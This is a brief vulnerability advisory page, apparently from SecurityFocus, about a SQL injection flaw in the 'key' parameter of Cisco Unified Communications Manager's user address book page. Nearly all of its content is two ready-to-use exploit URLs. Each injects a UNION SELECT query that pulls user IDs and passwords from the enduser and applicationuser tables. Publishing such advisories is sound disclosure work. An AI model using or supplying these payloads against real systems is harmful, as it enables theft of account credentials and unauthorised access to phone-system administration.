Cisco Unified Communications Manager 'key' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following examples are available:

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','',firstname,lastname,userid,password+from+enduser;--

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','','',user,'',password+from+applicationuser;--


 

Privacy Statement
Copyright 2010, SecurityFocus